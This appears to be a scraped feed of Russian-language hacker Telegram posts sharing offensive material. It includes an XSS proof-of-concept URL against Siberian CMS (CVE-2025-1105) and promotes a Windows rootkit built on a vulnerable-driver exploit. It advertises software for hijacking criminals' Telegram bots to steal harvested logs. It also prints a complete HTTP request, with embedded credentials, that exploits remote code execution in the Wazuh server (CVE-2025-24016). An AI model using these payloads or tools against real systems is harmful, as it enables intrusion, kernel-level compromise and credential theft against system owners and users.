CVE-2025-1105
*
Siberian CMS (version - 4.20.6)
*
POC
*
Siberian CMS (version - 4.20.6)
*
POC
https://x.x.x.x/app/sae/design/desktop/flat"><img src=x onerror=alert(document.location)>/js/bootstrap-tagsinput.min.js
👍12🔥4😱2
This media is not supported in your browser
VIEW IN TELEGRAM
Кто же такой хакер Bratva ?
*
В рамках специального расследования, в нашу редакцию попала секретная VHS запись.
Проанализировав которую, были установлены следующие лица:
Петер Севера
Петр Левашов
Юрист Насковец
Статисты - кадровые офицеры редакции gaz3ta.ru
*
В рамках специального расследования, в нашу редакцию попала секретная VHS запись.
Проанализировав которую, были установлены следующие лица:
Петер Севера
Петр Левашов
Юрист Насковец
Статисты - кадровые офицеры редакции gaz3ta.ru
🔥25😱7👍3
Sunder
*
Это
Уязвимый драйвер Сандера в этой репе GitHub является драйвер
Сначала нужно разлочить драйвер (см описание в репе)
Sunder Rootkit
*
Это
Windows Rootkit на основе Fudmodule Rootkit от Lazarus Group. Ссылка на эту версию Sunder для примера эксплойта драйвера Appid.sysУязвимый драйвер Сандера в этой репе GitHub является драйвер
Dell dbutil_2_3.sys ( драйвер заблокирован Microsoft).Сначала нужно разлочить драйвер (см описание в репе)
Sunder Rootkit
👍12🔥5😱4
onliner
curl -s https://URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u👍25😱7
This media is not supported in your browser
VIEW IN TELEGRAM
Украсть у Бота !
Помните админы каналов всегда боялись добавлять в чЯты ботов ?
Правильно боялись (
Но ладно если просто антирекламный бот в открытом чате, а если это
или
Телега давно у черношляпников как
Так вот, перехватом ботов занимаются ВСЕ, менты ловят злых шляп, злые шляпы ловят хомяков и получают удобоваримый лог в телегу, более ленивые черные шляпы ловят в подворотне ботов первых шляп, копипастят логи и имеют свой
*
Ну так вот, тут один
*
В ролике все наглядно
*
DownLoad Thы soft (x_)
#telegram #steal #bots #logs
Помните админы каналов всегда боялись добавлять в чЯты ботов ?
Правильно боялись (
ID рано или поздно всплывет, или набрутят или etc).Но ладно если просто антирекламный бот в открытом чате, а если это
Ransom BOT или LOGS BOTили
Zabbix BOT лол да)))Телега давно у черношляпников как
C&C сервер используется.Так вот, перехватом ботов занимаются ВСЕ, менты ловят злых шляп, злые шляпы ловят хомяков и получают удобоваримый лог в телегу, более ленивые черные шляпы ловят в подворотне ботов первых шляп, копипастят логи и имеют свой
сладкий шекель.*
Ну так вот, тут один
threat hunter имел неосторожность написать софтину, которая автоматизирует большую часть процесса, ты только парсить логи успевай !*
В ролике все наглядно
*
DownLoad Thы soft (x_)
#telegram #steal #bots #logs
🔥42😱16👍6
CVE-2025-24016
*
RCE in Wazuh server
wazuh-manager version >= 4.4.0
Patched in version >= 4.9.1
*
RCE in Wazuh server
wazuh-manager version >= 4.4.0
Patched in version >= 4.9.1
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}
🔥27😱5👍2